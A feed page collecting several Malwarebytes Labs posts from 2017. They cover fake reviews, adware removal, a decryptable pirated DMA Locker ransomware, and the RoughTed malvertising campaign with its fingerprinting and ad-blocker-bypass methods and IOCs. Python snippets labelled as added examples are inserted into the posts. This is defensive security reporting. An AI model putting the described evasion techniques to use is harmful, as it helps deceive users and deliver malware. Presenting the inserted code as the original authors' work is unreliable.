Techie Feeds

Spotting fake reviews – have healthy online skepticism

Malwarebytes - Thu, 06/01/2017 - 14:00

One of the pieces of advice I most often give to friends and relatives regarding online threats is: research it.

Performing a simple Google search on a product, a strange phone number, or a business can reveal a wealth of data that can then be used to make an informed decision about what actions to take. And here is where we get to the crux of it all. Just as we now have to contend with “fake news,” some of the information unearthed by web research will be wrong, contain mistakes, or even attempt to deliberately mislead you.

Let’s take an example we often hear about:

  • A user has a computer problem.
  • They perform a Google search in an attempt to find a solution.
  • The results point them to the apparent official technical support for the product they are having issues with.

*Attentive readers will notice that we have touched on this subject in the past.

This is where a careful user should do a little bit of research

A simple Google search of “company name + scam” will often turn up some valuable information. A company that has pages upon pages of customer complaints should raise some red flags.

Some examples of the websites that Google displays when you perform such a search are repositories of customer experiences, such as the online presence of the Better Business Bureau, and even the official Facebook page of said business, to name a few. Perusing these complaints will help give you an idea of the trustworthiness of a business. Going the extra mile and doing this research also gives you time to think about the service you are looking at purchasing, which mitigates being rushed in your decisions.

Sometimes, legitimate users catch on!

Shills, sockpuppets, and personas

This research phase is also where we sometimes see a strange trend. A search on some of the websites that aggregate consumer complaints might show the first page of results filled with glowing reviews extolling the awesome customer service the reviewer received.

Let’s stop and think about this. Why are random users taking the time to register an account and file a glowing review on a site that predominantly focuses on negative experiences? Only a small number of customers will go to the effort of filling out a review, much less a positive one.

This is an effort to artificially bury the negative reviews on these sites, as users rarely visit anything beyond the first page of results. These reviews are created by shills, either employed by the company affected by the negative reviews or by an online reputation management firm.

These are companies that specialize in online reputation management and have been hired to clean up negative comments that would otherwise be prominently shown as the top search result. As an aside, any company that uses these techniques should fall victim to the “Streisand Effect” and immediately be viewed with extreme suspicion.

Spot the fakes

Some review sites will let you gather a little intel on the authors of reviews. Here are a few pointers for spotting fake ones:

  • Are all the positive reviews created on the same date? Organic reviews would be created at different times, fake ones might be done manually or programmatically in a short time frame.
  • Look for the age of the accounts with positive reviews. Real accounts would be created at different times, on different dates. Again, fake ones might be done manually or programmatically in a short time frame.
  • How many reviews do the accounts have? A real user might make reviews for several sites and services. A shill will almost only ever do the one. Maintaining a myriad of sockpuppet accounts is difficult.
  • Do they use a boilerplate? Are there multiple reviews with identical text from supposedly different authors? Boilerplates are a dead giveaway that there’s some reputation management going on.
  • Try pasting the review, or a portion of the text used in the review, in Google and searching for it. If the results turn up in multiple different reviews on different review sites, you have found a boilerplate!
  • If the first page of reviews is filled with positive comments, buck the trend and check the 2nd and 3rd pages. Reputation management outfits know almost no one checks past the first page. Valuable true negative comments often appear there.
  • Read the positive reviews carefully. Are they super polished? Perfect grammar? Real humans write in a way that is difficult to emulate. A boilerplate, or a professional shill, would have proofread the review and removed typos.
  • Beware of some review sites. They might be an advertisement for a specific product cleverly disguised as a review site!
  • Some reviews are solicited by the technician only when the interaction went well, effectively flooding the review site with genuine but selectively gathered positive reviews. This becomes apparent when there is an unusually large number of reviews for the website/service.
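The pointers above can be turned into a repeatable check. The following is an added example (not part of the original post): it runs the same-date, account-age, single-review and boilerplate heuristics over a small constructed batch of review records; the author names, dates, texts and review counts are all made up.

```python
"""Apply the post's fake-review pointers to a constructed batch of reviews.

Added example, not Malwarebytes' code. Each record is
(author, account_created, review_date, rating, text); REVIEW_COUNTS gives how
many reviews each account has posted site-wide. All values are constructed.
"""
import re
from collections import Counter, defaultdict
from datetime import date

POSITIVE = 4  # a rating at or above this counts as a positive review

REVIEWS = [
    ("alice1", date(2014, 3, 2), date(2016, 11, 5), 1,
     "Charged me twice and never fixed the laptop."),
    ("bob_k", date(2015, 7, 19), date(2017, 1, 12), 2,
     "Pushy upsell, the problem came back a week later."),
    ("happyuser77", date(2017, 4, 10), date(2017, 4, 11), 5,
     "Great service! The technician was very professional and solved my issue quickly."),
    ("techfan2017", date(2017, 4, 10), date(2017, 4, 11), 5,
     "Great service! The technician was very professional and solved my issue quickly."),
    ("janedoe88", date(2017, 4, 11), date(2017, 4, 11), 5,
     "great service, the technician was very professional and solved my issue quickly"),
    ("mark_reviews", date(2012, 1, 5), date(2017, 4, 11), 4,
     "Decent support, took two calls but they sorted it."),
]
REVIEW_COUNTS = {"alice1": 9, "bob_k": 3, "happyuser77": 1,
                 "techfan2017": 1, "janedoe88": 1, "mark_reviews": 27}


def normalize(text):
    """Lower-case, drop punctuation and collapse whitespace so lightly edited
    boilerplate still matches."""
    return re.sub(r"\s+", " ", re.sub(r"[^\w\s]", "", text.lower())).strip()


def boilerplate_groups(reviews):
    """Normalised texts that appear under two or more distinct authors."""
    authors = defaultdict(set)
    for author, _, _, _, text in reviews:
        authors[normalize(text)].add(author)
    return {text: who for text, who in authors.items() if len(who) > 1}


def same_day_positive(reviews, threshold=3):
    """Dates on which at least `threshold` positive reviews were posted."""
    per_day = Counter(posted for _, _, posted, rating, _ in reviews
                      if rating >= POSITIVE)
    return {day: n for day, n in per_day.items() if n >= threshold}


def young_accounts(reviews, max_age_days=30):
    """Authors whose account was created shortly before posting a positive review."""
    return sorted(author for author, created, posted, rating, _ in reviews
                  if rating >= POSITIVE and (posted - created).days <= max_age_days)


def single_review_accounts(reviews, counts):
    """Authors in this batch with exactly one review site-wide."""
    return sorted(author for author, *_ in reviews if counts.get(author, 0) == 1)


def suspicion_report(reviews, counts):
    """Run every heuristic; the more that fire, the less the site should be trusted."""
    report = {
        "boilerplate": boilerplate_groups(reviews),
        "same_day_positive": same_day_positive(reviews),
        "young_accounts": young_accounts(reviews),
        "single_review_accounts": single_review_accounts(reviews, counts),
    }
    report["signals_fired"] = sum(1 for value in report.values() if value)
    return report


if __name__ == "__main__":
    for key, value in suspicion_report(REVIEWS, REVIEW_COUNTS).items():
        print(f"{key}: {value}")
```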

There are no hard rules for detecting fake reviews, and some real ones might exhibit the symptoms of fake reviews and vice versa. A good indicator is critical mass: if there are multiple dubious examples on the review site, you should take all the reviews on the site with a grain of salt.

Attempting to manage negative reviews by having a brigade of sockpuppets bury them with fictitious positive ones is in itself a good indicator of malfeasance.

Identical text across multiple reviews, with different users, review creation date, and geographical location.

1140 positive reviews! An example of flooding.

On the honesty of review sites

As if the waters were not murky enough, the review sites themselves sometimes have a financial stake in either showing negative reviews or conveniently hiding them. Some review sites have been repeatedly accused of giving preferential treatment to businesses that subscribe to their services. Others have been compared to a shakedown or strong-arm operation.

Subscribe to our service, buy advertising space on our site, pay for a membership… Do this and the negative reviews will be buried several pages in, away from view.

This subject alone could fill a separate article.

Reviews, complaint boards, and Google searches are powerful tools at your disposal to help in the decision process when evaluating a service. Robust online skepticism will keep these tools useful despite the shenanigans of less than reputable online presence management firms.

As always, stay safe, and if you have ever encountered shill reviews, please share them in our comments!

Jean Taggart

The post Spotting fake reviews – have healthy online skepticism appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Adware the series, part 4

Malwarebytes - Wed, 05/31/2017 - 14:00

In this series of posts, we will be using the flowchart below to follow the process of determining which adware we are dealing with. Our objective is to give you an idea of how many different types of adware are around for Windows systems. Though most are classified as PUPs, you will also see the occasional Trojan or rootkit, especially for the types that are more difficult to detect and remove.

Scheduled Tasks and Services

Two popular methods to deliver advertisements to your computer at regular intervals are Scheduled Tasks and Services. Both can easily be used to set a timer and show you a new advertisement at a set interval. The interval can be hours or mere minutes. For the advertiser, an interval in the range of hours has the advantage of being more inconspicuous as the user may close the advertisement and think nothing more of it. But a short interval brings in more money if you get paid by the impression (or by the number of unique views).

Scheduled Tasks

The Windows Task Scheduler is like an alarm clock that you can set to start a procedure under specified circumstances. You can set tasks to start at a certain time and repeat at a set interval, or to start on a certain occasion, most commonly when the computer boots up. Scheduled Tasks are the containers that hold the information about what has to happen and when. Since the introduction of Task Scheduler 2.0, Scheduled Tasks have the format of XML files and the job extension.

Once you are aware of the fact that a Scheduled Task is responsible, it is pretty easy to remove them. Be aware that they tend to come in small groups (2 or 3 tasks is what we’re used to seeing in most cases).

How to open the Task Scheduler

Windows XP and Windows 7

To open Scheduled Tasks, click Start, click All Programs, point to Accessories, point to System Tools, and then click Scheduled Tasks.

Windows 8 and Windows 10

Use the Search option to search for “Schedule” and choose “Schedule Task” to open the Task Scheduler.

Identify and delete a Scheduled Task

In the list of Scheduled Tasks find the ones that trigger the process associated with the advertisements. You can find the process name under the Action tab. Note that there may be switches set behind the filename like in the example below (GoogleUpdate.exe is the file name).

Select the Scheduled Task in the overview window and use the Delete option to remove it.

That’s all there is to it. As you can tell from the above, identifying the culprit as a Scheduled Task is the hardest part here. Removing Scheduled Tasks is easy enough once you are sure what to get rid of.
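Identifying the culprit gets easier when you can read the task definition itself. The following is an added example (not the post's own tooling): it parses a Task Scheduler 2.0 task XML file, as stored under %SystemRoot%\System32\Tasks or exported from the Task Scheduler console, and pulls out the executable behind the Action, the switches passed to it, and the repetition interval of each trigger. The task XML, executable path and switches below are constructed placeholders.

```python
r"""Summarise a Task Scheduler 2.0 task definition: what runs, when, how often.

Added example, not the post's tooling. Task Scheduler 2.0 keeps each task as
XML under %SystemRoot%\System32\Tasks (exported copies are UTF-16; decode to
str before parsing). The sample below is constructed; the executable path and
switches are placeholders standing in for an ad-popping task.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

SAMPLE_TASK_XML = r"""<Task version="1.2"
      xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition>
        <Interval>PT15M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2017-05-01T09:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
    <LogonTrigger>
      <Enabled>true</Enabled>
    </LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\victim\AppData\Local\AdPopper\adpop.exe</Command>
      <Arguments>/show /c=campaign42</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# ISO 8601 duration as written by Task Scheduler, e.g. PT15M or P1DT2H
DURATION_RE = re.compile(
    r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def iso_duration_seconds(value):
    """Convert PT15M-style durations to seconds; rejects forms it does not know."""
    match = DURATION_RE.match(value.strip())
    if not match:
        raise ValueError(f"unsupported duration: {value!r}")
    days, hours, minutes, seconds = (int(g) if g else 0 for g in match.groups())
    return ((days * 24 + hours) * 60 + minutes) * 60 + seconds


def summarize_task(xml_text):
    """Return the Exec actions (file name, full command, switches) and the
    triggers (type plus repetition interval in seconds, None if not repeating)."""
    root = ET.fromstring(xml_text)
    actions = []
    for exe in root.findall("t:Actions/t:Exec", NS):
        command = exe.findtext("t:Command", default="", namespaces=NS).strip()
        arguments = exe.findtext("t:Arguments", default="", namespaces=NS).strip()
        actions.append({
            "command": command,
            # the bare file name is what you look for in the Action tab
            "exe": command.replace("\\", "/").rsplit("/", 1)[-1],
            "arguments": arguments,
        })
    triggers = []
    triggers_el = root.find("t:Triggers", NS)
    for trig in (triggers_el if triggers_el is not None else []):
        interval = trig.findtext("t:Repetition/t:Interval", default=None, namespaces=NS)
        triggers.append({
            "type": trig.tag.split("}")[-1],  # strip the XML namespace from the tag
            "repeat_seconds": iso_duration_seconds(interval) if interval else None,
        })
    return {"actions": actions, "triggers": triggers}


def frequent_triggers(summary, max_seconds=3600):
    """Triggers that fire at least hourly: the ad cadence the post describes."""
    return [t for t in summary["triggers"]
            if t["repeat_seconds"] is not None and t["repeat_seconds"] <= max_seconds]


if __name__ == "__main__":
    summary = summarize_task(SAMPLE_TASK_XML)
    for action in summary["actions"]:
        print(f"runs {action['exe']} with switches {action['arguments']!r}")
    for trig in frequent_triggers(summary):
        print(f"{trig['type']} repeats every {trig['repeat_seconds']} s")
```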

Services

Windows services are programs that work in the background, and many of them are crucial for the operation of the system, so be careful when you start disabling them. Also, make a note of the order in which you disable services, since you may have to re-enable them in reverse order. Many services depend on others and are unable to run without the ones they depend on.

How to open the Services console

To see the list of services run services.msc in your Run prompt or from your search box.

Identify and disable a Service

If you right-click a line in the list of services and click Properties, you can see the path to the executable on the General tab.

When you have found the service that is responsible for the advertisement, you can Stop the service on that same tab and set the Startup type to Disabled.

That should stop the advertisements and prevent the service from starting again. If it does start again, there are other processes involved and you may be dealing with a rootkit. More about those later.

Index

Part 1
  • Identify the process
  • Clear browser caches
  • Remove browser extensions

Part 2
  • Proxies
  • Winsock hijackers
  • DNS hijackers

Part 3
  • Type of software
  • Uninstall
  • Remove file
  • Replace file

Part 4
  • Scheduled tasks
  • Services

Up next, part 5
  • DLLs
  • Handles
  • Parent process


Pieter Arntz

The post Adware the series, part 4 appeared first on Malwarebytes Labs.


A week in security (May 22 – May 28)

Malwarebytes - Mon, 05/29/2017 - 17:48

Last week we informed you about several new threats, including the Android ransomware that targets Tencent users. This SLocker.fh masquerades as various legitimate apps to fool users into granting it escalated rights.

Or how about the potential danger of Chrome users spilling their Windows credentials? All the attackers need you to do is visit their site.

Some of these threats are so unsettling they even frighten us. We listed 5 cyberthreats to keep an eye on.

We also brought you up to speed on RoughTed, a malvertising campaign that is unique for its considerable scope, ranging from scams to exploit kits, and that targets a wide array of users via their operating system, browser, and geolocation to deliver the appropriate payload.

Other noteworthy news in cybersecurity:

Safe surfing, everyone!

The Malwarebytes Labs Team

The post A week in security (May 22 – May 28) appeared first on Malwarebytes Labs.


A stolen version of DMA Locker is making the rounds

Malwarebytes - Mon, 05/29/2017 - 14:21

Ransomware has become a popular criminal business with a relatively low barrier to entry. Even people with little technical knowledge can build their own ransomware based on open source code that was published on the internet some time ago. Nevertheless, cybercriminals keep stealing, not only from victims, but also from each other. Some time ago we heard about PetrWrap – a ransomware built upon a binary of the infamous Petya. But that is not the only case. For some time, we have been observing a threat actor who distributes patched DMA Locker binaries.

Real or stolen DMA Locker – why would you care?

The observed samples of the stolen version of DMA Locker have all been built from one and the same instance of DMA Locker, so they carry the same public key inside. This implies that all the victims of this version can get their data back with the help of the same private key. And now comes the best part: we have this key and we distribute it for free to all affected persons.

If you are a victim of the fake DMA Locker, you can send an e-mail with samples of your encrypted files to:

How to recognize the stolen versions?

Since the fake DMA Locker is based on the binary of the original DMA Locker 3.0, they have exactly the same GUI – only the keywords referring to DMA Locker have been removed:

The main difference between the original and the stolen DMA Locker is a different marker at the beginning of the encrypted file. While the real DMA Locker prefixes content with !DMALOCK, the stolen version has many different prefix patterns. Some we have observed are:

  • !XPTLOCK5.0
  • !Locked#2.0
  • !Locked!###
  • !Encrypt!##

However, the threat actor changes them periodically, so anything that differs from the standard pattern may suggest that we are dealing with the “pirated”, decryptable version.
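The marker check above is easy to script for triage. The following added example (not Malwarebytes' decryptor) reads the first bytes of each file in a folder and classifies it as carrying the genuine !DMALOCK marker, one of the pirated markers listed above, some other “!”-led marker, or no marker at all; the sample files it writes are constructed.

```python
"""Sort encrypted files by their leading marker, per the post's description.

Added example, not Malwarebytes' decryptor. The genuine DMA Locker prefixes
encrypted content with !DMALOCK; the pirated build uses other markers, some
listed in the post, and the actor rotates them. Sample files are constructed.
"""
import tempfile
from pathlib import Path

GENUINE_MARKER = b"!DMALOCK"
KNOWN_FAKE_MARKERS = (b"!XPTLOCK5.0", b"!Locked#2.0", b"!Locked!###", b"!Encrypt!##")
HEADER_BYTES = 16  # enough to cover any marker seen so far


def classify_header(header):
    """Return (verdict, marker). Verdicts: genuine_dmalocker, known_pirated_marker,
    unknown_marker (a '!'-led tag that is not the genuine one), no_marker."""
    if header.startswith(GENUINE_MARKER):
        return "genuine_dmalocker", GENUINE_MARKER.decode()
    for marker in KNOWN_FAKE_MARKERS:
        if header.startswith(marker):
            return "known_pirated_marker", marker.decode()
    if header[:1] == b"!":
        # Unknown tag: take the printable ASCII run after '!', capped at 12 bytes,
        # since ciphertext following the marker may itself look printable.
        end = 1
        while end < min(len(header), 12) and 0x21 <= header[end] <= 0x7E:
            end += 1
        return "unknown_marker", header[:end].decode("ascii")
    return "no_marker", None


def triage_directory(directory):
    """Classify every regular file in `directory` by its first HEADER_BYTES bytes."""
    results = {}
    for path in sorted(Path(directory).iterdir()):
        if path.is_file():
            with path.open("rb") as fh:
                results[path.name] = classify_header(fh.read(HEADER_BYTES))
    return results


def demo():
    """Write constructed sample files to a temp folder and triage them."""
    samples = {
        "report.docx": GENUINE_MARKER + b"\x8f\x11\x02\xa4\x00\x7c",  # genuine build
        "photo.jpg": b"!XPTLOCK5.0" + b"\x02\xb7\x00\x19",            # listed pirated marker
        "budget.xlsx": b"!Nope#1.0" + b"\x00\x13\xfe\x42",            # unseen '!' marker
        "notes.txt": b"plain text, never encrypted",                  # untouched file
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, content in samples.items():
            Path(tmp, name).write_bytes(content)
        return triage_directory(tmp)


if __name__ == "__main__":
    for name, (verdict, marker) in demo().items():
        print(f"{name:12} {verdict:22} {marker}")
```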

Example of file encrypted by the fake DMA Locker:

What are the chances to get the data back?

Up to now we have managed to help 100% of the known victims of the fake DMA Locker. So far, the threat actor responsible for distributing it has not changed the key, so the prospects of getting data back are still good. However, the chance of getting help shrinks drastically if you were attacked with the legitimate DMA Locker, which may look the same at first sight.

How to prevent the attack?

Distributors of the fake (as well as the original) DMA Locker enter the victim machine via compromised Remote Desktop. We therefore recommend checking whether you have Remote Desktop exposed and, if so, whether it is properly secured.

Analyzed sample – fake DMA Locker, adding “!Encrypt!##” prefix.


Currently in distribution is version 3.0 of DMALocker, since the development of 4.0 was abandoned. Read more about our research:

DMA Locker 4.0: Known ransomware preparing for a massive distribution

The post A stolen version of DMA Locker is making the rounds appeared first on Malwarebytes Labs.


RoughTed: The anti ad-blocker malvertiser

Malwarebytes - Thu, 05/25/2017 - 14:00

RoughTed is a large malvertising operation that peaked in March 2017 but has been going on for well over a year. It is unique for its considerable scope, ranging from scams to exploit kits, and it targets a wide array of users via their operating system, browser, and geolocation to deliver the appropriate payload.

We estimate that the traffic via RoughTed related domains accumulated to over half a billion hits and was responsible for many successful compromises due to effective techniques that triage visitors and bypass ad-blockers.

The threat actors behind RoughTed have been leveraging the Amazon cloud infrastructure, in particular, its Content Delivery Network (CDN), while also blending in the noise with multiple ad redirections from several ad exchanges, making it more difficult to identify the source of their malvertising activity.

  • Traffic comes from thousands of publishers, some ranked in Alexa’s top 500 websites.
  • RoughTed domains accumulated over half a billion visits in the past 3 months alone.
  • Threat actors are leveraging fingerprinting and ad-blocker bypassing techniques upstream.
  • RoughTed can deliver a variety of payloads for each platform: scams, exploit kits, and malware.

Campaign identification

While studying the Magnitude exploit kit, we came across an interesting redirection chain from a domain name called roughted[.]com, hence the nickname ‘RoughTed’ we gave to this threat actor and campaign.

This domain was calling out to an XML feed to serve ads, but because of our geolocation at the time (South Korea), we were redirected to the Magnitude exploit kit via its pre-filtering gate, also known as ‘Magnigate’.

Over the course of a few days, we noticed a similar referer as roughted[.]com, with the same URL structure redirecting to the RIG exploit kit this time. Upon mining our data set, we started seeing that pattern for over a hundred other domains and mapped out some of the most prolific ones.

Numbers above added up from analytics.

The majority of the domains were created via the EvoPlus registrar in small batches with a new .ru or .ua email address each time. Another thing in common that these domains have is that they are being used as a gateway meant to bypass ad-blockers (we will expand on that aspect later).

The visualization below shows clusters representing domain names assigned to a unique registrant email.

Within each cluster, we can see that the domain naming convention follows a certain pattern, with one or two strings being used in various positions. For example, below we have the strings ‘get’ and ‘fun’ used to build the domain name.

This in itself is not shocking (it could simply be a lack of imagination), but it becomes interesting when two separate clusters are semantically related (different registrant email but similar domain names). This allows us to connect the campaigns together in yet another way (besides the URI patterns).

For instance, let’s zoom in on two clusters that show different email addresses. We see that the common string here is ‘parser’, used in both, and it is not just a ‘coincidence’.
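The cross-cluster linkage described above can be automated. As an added example (not the post's tooling), the code below groups constructed WHOIS-style records by registrant email, extracts the substrings shared by every domain in each cluster, and reports clusters that share a naming string such as ‘parser’. The domains and e-mail addresses are made-up placeholders, not RoughTed indicators.

```python
"""Link registrant clusters of domain names through shared naming strings.

Added example, not Malwarebytes' tooling. Mirrors the analysis in the post:
group domains by registrant email, find the substring(s) every domain in a
cluster shares, then link clusters that share one of those substrings.
All domains and emails below are constructed placeholders.
"""
from collections import defaultdict
from itertools import combinations

MIN_LEN = 3  # shared substrings shorter than this are too noisy to count

# Constructed WHOIS-style records: (domain, registrant email)
RECORDS = [
    ("getfunnow.example", "reg-a@example.ru"),
    ("funget24.example", "reg-a@example.ru"),
    ("mygetfun.example", "reg-a@example.ru"),
    ("parserzone.example", "reg-b@example.ua"),
    ("topparser.example", "reg-b@example.ua"),
    ("parserhub.example", "reg-c@example.ru"),
    ("fastparser.example", "reg-c@example.ru"),
    ("unrelatedshop.example", "reg-d@example.ru"),
    ("randomstore.example", "reg-d@example.ru"),
]


def label(domain):
    """Second-level label only: 'getfunnow.example' -> 'getfunnow'."""
    return domain.split(".")[0].lower()


def substrings(s, min_len=MIN_LEN):
    """All substrings of s with at least min_len characters."""
    return {s[i:j] for i in range(len(s)) for j in range(i + min_len, len(s) + 1)}


def maximal(subs):
    """Drop substrings contained in a longer shared substring ('par' inside 'parser')."""
    return {a for a in subs if not any(a != b and a in b for b in subs)}


def cluster_by_registrant(records):
    """{registrant email: [domain labels]}"""
    clusters = defaultdict(list)
    for domain, email in records:
        clusters[email].append(label(domain))
    return clusters


def shared_tokens(labels):
    """Maximal substrings present in every domain label of one cluster."""
    common = substrings(labels[0])
    for other in labels[1:]:
        common &= substrings(other)
    return maximal(common)


def link_clusters(records):
    """{(email_a, email_b): shared tokens} for cluster pairs with a common naming string."""
    tokens = {email: shared_tokens(labels)
              for email, labels in cluster_by_registrant(records).items()}
    links = {}
    for a, b in combinations(sorted(tokens), 2):
        overlap = tokens[a] & tokens[b]
        if overlap:
            links[(a, b)] = overlap
    return links


if __name__ == "__main__":
    for email, labels in cluster_by_registrant(RECORDS).items():
        print(f"{email}: tokens {sorted(shared_tokens(labels))}")
    for (a, b), overlap in link_clusters(RECORDS).items():
        print(f"linked {a} <-> {b} via {sorted(overlap)}")
```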

Publishers

The term ‘publisher’ is commonly used in the advertising industry to refer to websites that display adverts to generate online revenues. Publishers are typically providers of content (news, media files, etc.) which drive people to visit them regularly. The cost of advertising is not only dependent on how popular a website is, but also on other variables which revolve around the kind of audience a publisher captures.

The bulk of the traffic for the RoughTed campaign comes from streaming video or file sharing sites closely intertwined with URL shorteners. These are areas where malicious actors love to lurk because of the sheer volume of traffic but also subpar standards for quality and safety of online advertising.

Below are some domains we spotted in our telemetry, ranking within Alexa’s top 1000. Visitors to these sites are targeted with ads and in some cases, some that belong to the RoughTed campaign. We will detail later to what kind of content users were exposed.

During our research, we spoke with Denis Sinegubko from website security company Sucuri who shared similar findings with how ‘personal’ websites were involved in this malvertising campaign. Webmasters knowingly integrated an ad code script from advertising company Ad-Maven into their pages in order to monetize their website.

The obfuscated script above contains an algorithm to generate future Amazon S3 URLs, but the buckets are only created for the next 3-5 days.

Each bucket contains a base64 encoded blurb which decodes to the current subdomain:

We have many examples of these subdomains (leveraging Amazon’s CDN, Amazon CloudFront) seen as a referrer to RoughTed domains in our telemetry as well:

Referer: ->{redacted}.&v=

Fingerprinting and ad-blocking evasion techniques

There’s more within this code and it has been raising eyebrows for its invasive nature, in particular for its use of fingerprinting techniques, in that case, ‘canvas fingerprinting’.

We can see it below again in a slightly different format (admvn.js), used by the URL shortener site and redirecting users to a RoughTed domain.

The point is to profile users with great granularity and identify those that may be cheating the system by lying about their browser or geolocation.

Typically the User-Agent string can determine a visitor’s OS and browser but it’s trivial to fake the UA and lie to the server. One clever alternative is to look for installed fonts since they are specific to certain operating systems, i.e. a Mac user will have different fonts than a Windows user (thank you Manuel ‘The Magician’ Caballero for pointing out this trick).

Another interesting aspect is that redirections to RoughTed domains seem to happen even to those running ad-blockers, as reported by users of Adblock Plus, uBlock Origin or AdGuard.

The animation below shows a redirection to one of the RoughTed gates that bypass the ad blocker in Google Chrome (ABP is shown installed and activated at the top right) and ultimately pushes a bogus Chrome extension. All a user has to do is click anywhere on the first page they visited and their browser will become hijacked.

Something for everyone

This malvertising campaign is quite diverse, and no matter what your operating system or browser is, you will receive a payload of some kind. Perhaps this should be something for publishers to take a deep hard look at, knowing what they may be subjecting their visitors to if they decide to use those kinds of adverts.

Adware for Mac

This is a fake Flash Player update that targets Mac users and tricks them into believing that the file comes from Apple. As a rule of thumb, you should only download software updates from the original manufacturer, not from a third party. Unfortunately, crooks can easily create deceiving pages or scare users into installing a fraudulent piece of software.

Traffic view

PUPs for Windows

There are countless fake updates for Flash, Java, not to mention all those ‘special’ codecs for Windows. The following page urges users to install a Java update which is laced with adware. When it comes to Java, it’s usually better not having it in the first place, let alone installing some shady updates.

Traffic view

Rogue Chrome extensions

There is no question that Chrome is one of the safest browsers, but unfortunately, malware purveyors and other ill-intentioned advertising companies are aggressively pushing rogue extensions that can collect or even modify the data on the sites you visit. Malvertising is a prime distribution method for bogus Chrome extensions, which are pushed in a forceful way, leaving users little choice but to install them in some cases.

Traffic view

Undesired redirections to iTunes/app store

There is a large quantity of ‘free’ apps out there, both for iOS and Android and their business model is either via in-app adverts or add-ons you can purchase. Some apps go one step too far by making the game too hard to beat without buying a certain item (this is also known as ‘pay-to-play’). But after all, it is up to users to make that choice to download those apps and opt for such purchases.

However, malvertising muddies the waters by performing automated redirections to ‘random’ apps and generating commissions for each install.

Traffic view

Tech support scams

Tech support scams have long been feeding off malvertising and targeting many different countries. Therefore it’s not surprising to see cases here via RoughTed as well.

Traffic view

Security researcher Malekal tweeted about a Tech Support Scam (TSS) campaign targeting French people. He points at the heavily obfuscated code, and we can spot a RoughTed domain in his screenshot within the HTTP traffic.

Surveys and other scams

Fake surveys or lottery pages are also commonplace via malvertising. In this particular sequence, we ran into NoTrove (a campaign first reported by RiskIQ).

Traffic view

Exploit kits

According to our telemetry records, the majority of victims impacted by exploit kits via the RoughTed malvertising campaign were in the US and Canada, followed by the U.K., Italy, Spain, and Brazil.


One very active malware campaign as of late is known as “Seamless” and has pushed a lot of the Ramnit banking Trojan, especially to Canadian users. It is easily recognizable by its use of IP-Literal hostnames that redirect to the RIG EK infrastructure.

Much of the upstream traffic comes from adult portals and popunder ad networks. Here you can see RoughTed involved in the ad call and chain via interesting multi-step hops leading to the Seamless campaign.

If you want to check the full redirection flow, please click here.

Magnitude EK

Magnitude EK has long been faithful to the Cerber ransomware as its dropped payload of choice. The bulk of infections are happening in South Korea, some in Taiwan and Hong Kong, and curiously, a few in Italy. The screenshot below is an example of a Cerber infection on a Korean user via the Magnitude exploit kit.

Traffic view

Same old, same old

Malvertising may look easy on the surface but is actually a much more complex and deep-rooted issue. We all know that it’s there and whenever a big case is uncovered, ad networks (and publishers) are blamed and it somewhat taints their brand for a little while.

But for the most part, malvertising continues unabated, especially with certain providers. The response from end users has traditionally been to gravitate towards ad-blockers as a means to avoid getting infected or bothered by obnoxious adverts.

Naturally, this has caused a similar knee-jerk reaction by some publishers and ad companies to fight back in various ways to protect their business. The rationale behind it is that people shouldn’t be getting free content that costs them money to come up with and host.

The use of dynamically created scripts to perform redirections that bypass ad-blockers is clever in many ways. For one, when a publisher includes the code on their site, it is unique to them as it is generated in their own dashboard, and by the same token, it is less likely to be detected. The script itself pulls data from a new URL every day, which means blocking new domains is truly a cat and mouse game that guarantees sufficient uptime to serve up ads.

It becomes a real issue when this ad-supported content pushes scams or malware, even to those running an ad-blocker. At this point, one should ask themselves who really is responsible: ad networks (which are fending for themselves) or publishers (and site owners) that knowingly expose their visitors to nefarious code for the sake of ad revenues.

Thanks to Denis from Sucuri for sharing his insights into injected adverts in personal websites.

Indicators Of Compromise (IOCs)

Regex to detect RoughTed campaign


Top RoughTed domains (by traffic)

A longer list can be found here.

Mac PUP (FLVPlayer.dmg)


Windows PUP (VideoPlayerSetup.exe)


Chrome extension (ABP bypass)

Chrome extension (SearchApp)

iTunes redirection

Tech support scam


Seamless campaign / RIG EK chain (Method, IP address and Domain name columns not recoverable; Comments column only):

  • RoughTed
  • Redirection
  • Malvertising
  • Malvertising POST
  • Seamless_Campaign_URL
  • Malvertising
  • Seamless_Campaign_URL
  • Seamless_Campaign_URL
  • RIG_EK_URL (Flash Exploit)
  • RIG_EK_URL (Landing Page)
  • RIG_EK_URL (Malware Payload)

Ramnit payload (SHA-256): cc4c5eabb76ebca1bc3af1d8e8a6629e72164f9ae0fc61287592548288937220

Magnitude EK

Magnitude EK chain (Method, IP address and Domain name columns not recoverable; Comments column only):

  • RoughTed
  • Malvertising
  • Magnigate
  • Magnigate
  • Magnitude_EK_Code (Landing Page)
  • Magnitude_EK_URL (Flash Exploit)
  • Magnitude_EK_URL (Kernel32 call)
  • Magnitude_EK_URL (Malware Payload)

Cerber payload (SHA-256): d9411664ad6f1451b7cbd2a9453e5824d566535bae480dfe533cda7e0bef0ae7

The post RoughTed: The anti ad-blocker malvertiser appeared first on Malwarebytes Labs.


5 Unsettling cyberthreats

Malwarebytes - Wed, 05/24/2017 - 18:39

Cyberthreats are typically boring, repetitive, and require a reasonably predictable remediation process. A SQL injection is a SQL injection, no matter who’s trying it. But what about the outliers? What about threats that impact you, but that you can’t remediate or establish a policy to cover?

Here are 5 cyberthreats that should frighten you, if they don’t already.

  1. VNC roulette. This was a website that scanned for computers that allowed remote sessions but were unsecured by passwords or encryption. A fair number of the screenshots the site collected were from average users who simply failed to set up proper security settings. But there were also machines for which that failure was much more serious, like SCADA systems, CCTVs, and water treatment plants.


  2. A public drone feed? Last week a security blogger discovered what appeared to be a publicly accessible Predator drone feed. As it turned out, the video was actually an unclassified demo page created by a defense contractor using a misconfigured web server. While not exactly the OPSEC blunder viewers thought, the amount of critical infrastructure exposed to the internet and managed via unaccountable third parties is food for thought.


